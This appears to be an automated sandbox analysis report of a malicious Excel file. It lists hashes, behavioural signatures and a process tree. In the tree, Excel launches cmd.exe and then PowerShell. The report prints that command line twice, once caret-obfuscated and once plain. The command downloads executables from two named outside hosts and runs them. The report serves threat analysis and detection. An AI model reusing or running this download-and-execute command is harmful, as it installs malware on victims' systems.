Analysis
max time kernel: 24s
max time network: 17s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 22-07-2024 22:25
Behavioral task: behavioral1
Sample: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource: win7-20240704-en
Behavioral task: behavioral2
Sample: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Resource: win10v2004-20240709-en
General
Target: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
Size: 52KB
MD5: 86f2a9879de336b1c983755b2615f926
SHA1: 19250c71f3eb28a6b4e3febef6dfa47a30e3342e
SHA256: 99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4
SHA512: d37da87e8a2e65b17f138540283e005b68016c7a2688889f621858b06cf1362cab8d21a91a4e99c47b87ec996e31c1813a389f45418eee45f91620800e987bcc
SSDEEP: 1536:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdg6boobYGF7:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdgw
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 3852 | 2216 | CMd.exe | 29
Blocklisted process makes network request (1 IoC)
flow | pid | Process
3 | 3876 | powershell.exe
Command and Scripting Interpreter: PowerShell (1 IoC)
pid | Process
3876 | powershell.exe
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry (2 TTPs, 1 IoC)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
2216 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (1 IoC)
pid | Process
3876 | powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 3876 | powershell.exe
Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
2216 | EXCEL.EXE
2216 | EXCEL.EXE
2216 | EXCEL.EXE
Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 2216 wrote to memory of 3852 | 2216 | EXCEL.EXE | 30
PID 2216 wrote to memory of 3852 | 2216 | EXCEL.EXE | 30
PID 2216 wrote to memory of 3852 | 2216 | EXCEL.EXE | 30
PID 2216 wrote to memory of 3852 | 2216 | EXCEL.EXE | 30
PID 3852 wrote to memory of 3876 | 3852 | CMd.exe | 32
PID 3852 wrote to memory of 3876 | 3852 | CMd.exe | 32
PID 3852 wrote to memory of 3876 | 3852 | CMd.exe | 32
PID 3852 wrote to memory of 3876 | 3852 | CMd.exe | 32
Processes
1. C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
   PID: 2216
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\CMd.exe (spawned by 1)
      Command line: CMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"
      PID: 3852
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (spawned by 2)
         Command line: powErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }
         PID: 3876
         - Blocklisted process makes network request
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken